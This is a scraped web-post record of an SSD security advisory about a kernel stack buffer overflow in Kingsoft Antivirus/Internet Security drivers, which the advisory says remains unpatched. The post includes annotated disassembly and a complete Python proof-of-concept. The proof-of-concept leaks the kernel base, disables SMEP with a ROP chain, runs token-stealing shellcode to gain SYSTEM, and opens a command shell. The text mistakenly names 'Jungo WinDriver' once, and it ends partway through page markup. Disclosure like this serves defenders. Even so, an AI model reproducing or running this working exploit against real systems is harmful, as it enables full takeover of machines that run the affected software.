{"id":10951,"date":"2017-12-26T14:19:25","date_gmt":"2017-12-26T22:19:25","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/26\/news-4723\/"},"modified":"2017-12-26T14:19:25","modified_gmt":"2017-12-26T22:19:25","slug":"news-4723","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/26\/news-4723\/","title":{"rendered":"SSD Advisory \u2013 Kingsoft Antivirus\/Internet Security 9+ Privilege Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 26 Dec 2017 10:03:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3597\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3597');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus\/Internet Security 9+.<\/p>\n<p>Kingsoft Antivirus &#8220;provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus tools prevent and protect your computer from unwanted virus, worms, and Trojans. With the simplest and easiest-to-use functions, users find themselves no difficulty to handle Kingsoft Antivirus.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Steven Seeley, has reported this vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact Kingsoft since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerability.<br \/> <span id=\"more-3597\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver.<\/p>\n<p>The specific flaws exists within the processing of IOCTL 0x80030004 or 0x80030008 by either the kavfm.sys (anti-virus) or the KWatch3.sys (internet security) kernel driver. <\/p>\n<p>The driver doesn&#8217;t properly validate user-supplied data which can result in a kernel stack buffer overflow. <\/p>\n<p>An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a42caec36001642084082\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ; jumptable 000117C1 case 0  .text:000117C8 loc_117C8:                                      ; CODE XREF: sub_11790+31  .text:000117C8                                                   .text:000117C8                 push    ebx                     ; our input buffer size  .text:000117C9                 lea     ecx, [esp+58h+var_40]   ; this is a fixed size stack buffer of 0x40  .text:000117CD                 push    edi                     ; our input buffer  .text:000117CE                 push    ecx                     ; char *  .text:000117CF                 call    strncpy                 ; stack buffer overflow  .text:000117D4                 add     esp, 0Ch  .text:000117D7                 lea     edx, [esp+54h+var_40]  .text:000117DB                 push    edx                     ; char *  .text:000117DC                 mov     [esp+ebx+58h+var_40], 0  .text:000117E1                 call    sub_167B0  .text:000117E6                 pop     edi  .text:000117E7                 mov     esi, eax  .text:000117E9                 pop     esi  .text:000117EA                 pop     ebp  .text:000117EB                 pop     ebx  .text:000117EC                 add     esp, 44h  .text:000117EF                 retn    8<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a42caec3600a215264132\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  from ctypes import *  from time import sleep  from ctypes.wintypes import *  import struct  import os  from random import choice    kernel32 = windll.kernel32  ntdll = windll.ntdll    MEM_COMMIT = 0x00001000  MEM_RESERVE = 0x00002000  PAGE_EXECUTE_READWRITE = 0x00000040  STATUS_SUCCESS = 0    def get_ioctl():      return choice([0x80030004, 0x80030008])        def alloc_shellcode(base, input_size):      &#8220;&#8221;&#8221;       allocates some shellcode      &#8220;&#8221;&#8221;      print &#8220;(+) allocating shellcode @ 0x%x&#8221; % base      baseadd = c_int(base)      size    = c_int(input_size)        # &#8211;[ setup]      input  = struct.pack(&#8220;&lt;I&#8221;, 0x000506f8)      # bypass smep        # &#8211;[ setup]      input += &#8220;x60&#8221;                             # pushad      input += &#8220;x64xa1x24x01x00x00&#8221;         # mov eax, fs:[KTHREAD_OFFSET]        # I have to do it like this because windows is a little special      # this just gets the EPROCESS. Windows 7 is 0x50, now its 0x80.      input += &#8220;x8dx40x70&#8221;                     # lea eax, [eax+0x70];      input += &#8220;x8bx40x10&#8221;                     # mov eax, [eax+0x10];      input += &#8220;x89xc1&#8221;                         # mov ecx, eax (Current _EPROCESS structure)        # win 10 rs2 x86 TOKEN_OFFSET = 0xfc      # win 07 sp1 x86 TOKEN_OFFSET = 0xf8      input += &#8220;x8Bx98xfcx00x00x00&#8221;         # mov ebx, [eax + TOKEN_OFFSET]        # &#8211;[ copy system PID token]      input += &#8220;xbax04x00x00x00&#8221;             # mov edx, 4 (SYSTEM PID)      input += &#8220;x8bx80xb8x00x00x00&#8221;         # mov eax, [eax + FLINK_OFFSET] &lt;-|      input += &#8220;x2dxb8x00x00x00&#8221;             # sub eax, FLINK_OFFSET           |      input += &#8220;x39x90xb4x00x00x00&#8221;         # cmp [eax + PID_OFFSET], edx     |      input += &#8220;x75xed&#8221;                         # jnz                           -&gt;|        # win 10 rs2 x86 TOKEN_OFFSET = 0xfc      # win 07 sp1 x86 TOKEN_OFFSET = 0xf8      input += &#8220;x8bx90xfcx00x00x00&#8221;         # mov edx, [eax + TOKEN_OFFSET]      input += &#8220;x89x91xfcx00x00x00&#8221;         # mov [ecx + TOKEN_OFFSET], edx        # &#8211;[ recover]      input += &#8220;x61&#8221;                             # popad      input += &#8220;x83xc4x0c&#8221;                     # adjust the stack by 0xc      input += &#8220;x31xc0&#8221;                         # return NTSTATUS = STATUS_SUCCESS      input += &#8220;xc3&#8221;                             # ret        # filler      input += &#8220;x43&#8221; * (input_size-len(input))      ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,                                                 POINTER(c_int), c_int, c_int]      dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,                                                byref(size),                                                MEM_RESERVE|MEM_COMMIT,                                               PAGE_EXECUTE_READWRITE)      if dwStatus != STATUS_SUCCESS:          print &#8220;(-) Error while allocating memory: %s&#8221; % hex(dwStatus + 0xffffffff)          return False      written = c_ulong()      write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))      if write == 0:          print &#8220;(-) Error while writing our input buffer memory: %s&#8221; % write          return False      return True    def alloc(base, input_size, ip):      baseadd   = c_int(base)      size = c_int(input_size)      input = &#8220;x44&#8221; * 0x40                       # offset to ip        # start our rop chain      input += struct.pack(&#8220;&lt;I&#8221;, nt + 0x51976f)   # pop ecx; ret      input += struct.pack(&#8220;&lt;I&#8221;, 0x75757575)      # junk      input += struct.pack(&#8220;&lt;I&#8221;, 0x76767676)      # junk      input += struct.pack(&#8220;&lt;I&#8221;, ip)              # load 0x506f8      input += struct.pack(&#8220;&lt;I&#8221;, nt + 0x04664f)   # mov eax, [ecx]; ret      input += struct.pack(&#8220;&lt;I&#8221;, nt + 0x22f2da)   # mov cr4,eax; ret      input += struct.pack(&#8220;&lt;I&#8221;, ip + 0x4)        # &amp;shellcode        # filler      input += &#8220;x43&#8221; * (input_size-len(input))        ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,                                                 POINTER(c_int), c_int, c_int]      dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,                                                byref(size),                                                MEM_RESERVE|MEM_COMMIT,                                               PAGE_EXECUTE_READWRITE)      if dwStatus != STATUS_SUCCESS:          print &#8220;(-) error while allocating memory: %s&#8221; % hex(dwStatus + 0xffffffff)          sys.exit()      written = c_ulong()      write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))      if write == 0:          print &#8220;(-) error while writing our input buffer memory: %s&#8221; % write          sys.exit()    def we_can_trigger_overflow():      GENERIC_READ  = 0x80000000      GENERIC_WRITE = 0x40000000      OPEN_EXISTING = 0x3      IOCTL_VULN    = get_ioctl()      DEVICE_NAME   = &#8220;\\\\.\\KWatch3&#8221;      dwReturn      = c_ulong()      driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)      ip            = 0x24242424            inputbuffer   = 0x41414141      inputbuffer_size = 0x60      outputbuffer_size = 0x1000      outputbuffer      = 0x20000000            alloc(inputbuffer, inputbuffer_size, ip)      alloc_shellcode(ip, 0x100)      alloc(outputbuffer, 0x100, ip)        IoStatusBlock = c_ulong()      if driver_handle:          print &#8220;(+) sending stack overflow&#8230;&#8221;          dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,                                         None,                                         None,                                         None,                                         byref(IoStatusBlock),                                         IOCTL_VULN,                                         inputbuffer,                                         inputbuffer_size,                                         outputbuffer,                                         outputbuffer_size                                         )          return True      return False    def we_can_leak_the_base():      &#8220;&#8221;&#8221;      Get kernel base address.      This function uses psapi!EnumDeviceDrivers which is only callable      from a non-restricted caller (medium integrity or higher). Also the      assumption is made that the kernel is the first array element returned.      &#8220;&#8221;&#8221;      global nt      print &#8220;(+) enumerating kernel base address&#8230;&#8221;            array = c_ulonglong * 1024      lpImageBase = array()      szDriver    = array()      cb = sizeof(lpImageBase)      lpcbNeeded = c_long()        res = windll.psapi.EnumDeviceDrivers(byref(lpImageBase),                                           sizeof(lpImageBase),                                           byref(lpcbNeeded))      if not res:          print &#8220;(-) unable to get kernel base: &#8221; + FormatError()          sys.exit(-1)        # nt is the first one      nt = lpImageBase[0] &amp; 0x00000000ffffffff      return True    def main():      print &#8220;nt&#8211;[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]&#8221;      print &#8220;t               Steven Seeley (mr_me) of Source Incitern&#8221;      if we_can_leak_the_base():          print &#8220;(+) found nt base at 0x%08x&#8221; % (nt)          if we_can_trigger_overflow():              os.system(&#8220;cmd.exe&#8221;)      else:          print &#8220;(-) it appears that kingsoft Internet Security is not installed!&#8221;  if __name__ == &#8216;__main__&#8217;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-154\">154<\/div>\n<div class=\"crayon-num\" 